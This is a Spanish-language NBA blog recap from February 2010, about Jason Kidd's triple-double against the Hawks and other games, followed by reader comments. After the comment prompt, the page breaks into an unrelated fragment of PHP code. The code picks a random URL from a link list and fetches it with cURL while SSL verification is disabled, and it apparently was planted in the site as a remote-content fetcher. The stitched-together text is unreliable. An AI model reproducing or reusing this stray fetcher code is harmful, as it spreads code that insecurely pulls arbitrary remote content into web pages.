La Crónica (26/02/2010)

27 de February de 2010 por TheDeerHunter

Tuvo que salir el entrenador de los Hawks, Mike Woodson, a la misma cancha a defender a Jason Kidd. Tal y como lo contamos. Menudo revuelo se armó. A falta de poco más de un minuto del tiempo reglamentario, en el fulgor de la batalla, el técnico interrumpió un desplazamiento de Kidd al estar literalmente metido dentro de la cancha. Se puede decir que fue el único que lo logró. Dejando a parte el broncón consiguiente y la curiosidad de la anécdota, el señor Kidd, con sus 36 añitos a cuestas, registró el 104º triple doble de su carrera siendo virtualmente imparable para ninguno de sus pares en la victoria en la prórroga de los Mavs sobre los Hawks.

Trataremos de ser breves, con tantísimos partidos por medio.

Los Cavs también tuvieron que tirar de prórroga para doblegar a los Raptors. Ni siquiera llegaron a ella Orlando, no pudiendo frenar a un David West demoledor.

En el Oeste, Lakers y Nuggets sacaron adelante sus choques frente Sixers y Pistons respectivamente, ambos con ciertas dificultades mientras que los Thunder se pasearon contra los Wolves, como los Suns lo hicieron contra Clippers en el partido de su vida de Robin Lopez. Los Jazz tropezaron en el Arco Arena y es que Udrih y Tyreke fueron anoche demasiado para ellos. Los Spurs tampoco pudieron sacar la victoria del Toyota Center de Houston. Fue el mejor partido de Kevin Martin desde que aterrizó en su nuevo equipo, muy bien apoyado por Brooks y Scola. Los Blazers perdieron en Chicago ante una buena actuación de Rose. No aprovechó la ocasión Memphis de reducir distancias, pues no pudieron contra Stephen Jackson y sus Bobcats.

Para terminar, tuvo lugar la primera victoria de Sergio con los Knicks. No brilló pero hizo un partido sólido. La estrella de la velada fue Al Harrington.

PREMIOS

MVP: David West, 40 puntos, 10 rebotes contra Dwight Howard; LeBron James, 36 ptos, 6 rebotes, 9 asistencias; Dirk Nowitzki, 37 puntos 9 rebotes… sin embargo yo me quedo con Jason Kidd en el mejor partido de los últimos años: 19ptos, 16 rebotes, 17 asistencias y 2 robos, el muy animal.

El rookie: Vuelve a golpear Tyreke: 24 puntos, 8 rebotes, 7 asistencias y victoria de los Kings ante unos cocos como Utah.

La sorpresa: Ya pensábamos que Kevin Martin no iba a arrancar. Anoche anotó 33 puntos en la victoria ante los Spurs. Los Rockets le necesitan como el comer.

La decepción: McDyess, Finley y Bogans. Tres titulares de los Spurs: 0 puntos.

El mayor esfuerzo en vano: Elegiremos a Dwight Howard. 26 puntos  y 10 rebotes.

Comenta

8 comentarios a esta entrada

  1. jhc dice:
    #1

    para esfuerzo en vano el de Boozer 26 puntos 10 rebotes 6 asistencias kon los k no pudo contrarestar a la pareja udrh-evans

      Citar

  2. Rompe dice:
    #2

    Muy buenos partidos hoy, con hasta 4 OT! Lebron impresionante, pero como siempre. Creo que este año es el claro favorito para el MVP. Ha tenido partidos mejores y otros no tan buenos (se queda en 20 puntos jeje), pero creo que no ha tenido un solo partido malo. Kobe ha sido bastante más irregular…

      Citar

  3. Hynreck dice:
    #3

    Que brutalidad de triple doble por Dios, no me acuerdo de ningun otro en que se haya logrado mas de 15 en 3 apartados estadisticos, Habria que ponerle un nombre a esto.

      Citar

  4. Moman dice:
    #4

    hombre, la sorpresa debería ser Robin lopez con su 30-10 que es flipante para un tio que a principios de año no jugaba 10 minutos

      Citar

  5. Txusma dice:
    #5

    Ya que Hynreck lo ha comentado he buscado el dato de cuantas veces algun jugador ha logrado al menos 15 en 3 apartados estadísticos desde 1986
    Me salen 5 jugadores: Kidd lo ha hecho 2 veces, Magic otras 2, Bird una vez más y, ojo al dato, Shaquille O’Neal que en el 93 logró 24 puntos, 28 rebotes y 15 tapones y Manute Bol, que hizo 10 puntos, 19 rebotes y 15 tapones… Vaya animaladas!

      Citar

  6. Tobal dice:
    #6

    Ahí está el gran Jason Kidd,haciendo triples dobles año tras año,es increible los rebotes que coge,siendo un base organizador,partidazo tambien de Nowitzki que está en un gran momento.

      Citar

  7. Dantley2 dice:
    #7

    No discuto si es más o menos normal hacerlo, pero la jugada de Kidd es un ejemplo brutal de capacidad de estar alerta a todo en una cancha de baloncesto.

    Por cierto, mea culpa, creía que este año ya Kidd no daría estas exhibiciones, pero sí, qué jugador. Ya quisieran otros que parece que se han comido el mundo y todavía no han hecho nada tener la visión de Kidd. Me gustaría ver a los Mavs campeones para hacer justicia a la carrera de Kidd.

      Citar

  8. Love Denise dice:
    #8

    muy buena la información de txusma, y vaya numeros de o’neal en ese partido.

    Me ha gustado mucha esta frase de Dantley2, se podría aplicar a ciertos bases inflados por la prensa:
    “”Ya quisieran otros que parece que se han comido el mundo y todavía no han hecho nada tener la visión de Kidd.””

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>